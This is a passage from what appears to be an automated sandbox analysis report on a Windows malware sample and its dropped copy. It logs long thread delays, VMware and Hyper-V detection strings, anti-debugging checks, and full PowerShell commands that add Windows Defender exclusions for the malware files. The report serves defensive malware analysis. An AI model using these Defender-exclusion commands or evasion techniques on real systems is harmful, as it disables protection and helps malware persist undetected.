                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -99422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -99312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -99203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -99094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -98953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -98844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -98734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -98623s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -98515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -98405s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -98297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -98187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -98078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -97969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -97844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -97732s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -97625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -596140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -595922s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -595812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -595703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -595593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -595484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -595375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -595266s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -595048s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -594930s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -594828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -594718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -594609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -594500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -594382s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -594281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -594172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -594062s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -593953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -593844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -593719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe TID: 3800Thread sleep time: -593609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 2268Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -26747778906878833s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 6820Thread sleep count: 1408 > 30
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 6820Thread sleep count: 8440 > 30
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599563s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -599110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -598737s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99545s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98561s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98343s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98233s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -98125s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -596597s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -596266s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -596141s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -596031s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -595922s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -595813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -595688s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -595563s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -595453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -595344s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -595219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -595109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -595000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -594891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -594781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -594672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -594563s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -594438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -594327s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -594219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -594094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -593985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe TID: 5668Thread sleep time: -593860s >= -30000s
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599856Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599726Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599624Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599475Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599326Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 599167Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 598887Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 598780Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 598670Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 99859Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 99750Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 99640Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 99531Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 99422Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 99312Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 99203Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 99094Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 98953Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 98844Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 98734Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 98623Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 98515Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 98405Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 98297Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 98187Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 98078Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 97969Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 97844Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 97732Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 97625Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595922Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595484Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595375Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595266Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 595048Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594930Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594828Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594718Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594609Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594382Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594281Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594172Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 594062Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 593953Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 593719Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeThread delayed: delay time: 593609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599891
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599672
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599563
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599438
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599218
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 599110
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 598737
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 99875
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 99765
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 99545
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 99437
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 99328
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 99218
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 99109
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 99000
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 98890
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 98781
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 98672
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 98561
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 98453
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 98343
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 98233
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 98125
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 596597
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 596266
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 596141
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 596031
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595922
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595813
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595688
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595563
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595453
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595344
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595219
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595109
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 595000
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594891
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594781
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594672
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594563
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594438
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594327
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594219
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 594094
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 593985
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeThread delayed: delay time: 593860
                    Source: XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: XNYbGrcoFr.exe, 0000000B.00000002.2170152111.00000000084E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: XNYbGrcoFr.exe, 0000000E.00000002.4535915525.00000000012EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                    Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4535435384.0000000000DC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeCode function: 9_2_02947EC0 CheckRemoteDebuggerPresent,9_2_02947EC0
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exeProcess queried: DebugPort
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"Jump to behavior
                    Injects a PE file into a foreign processes
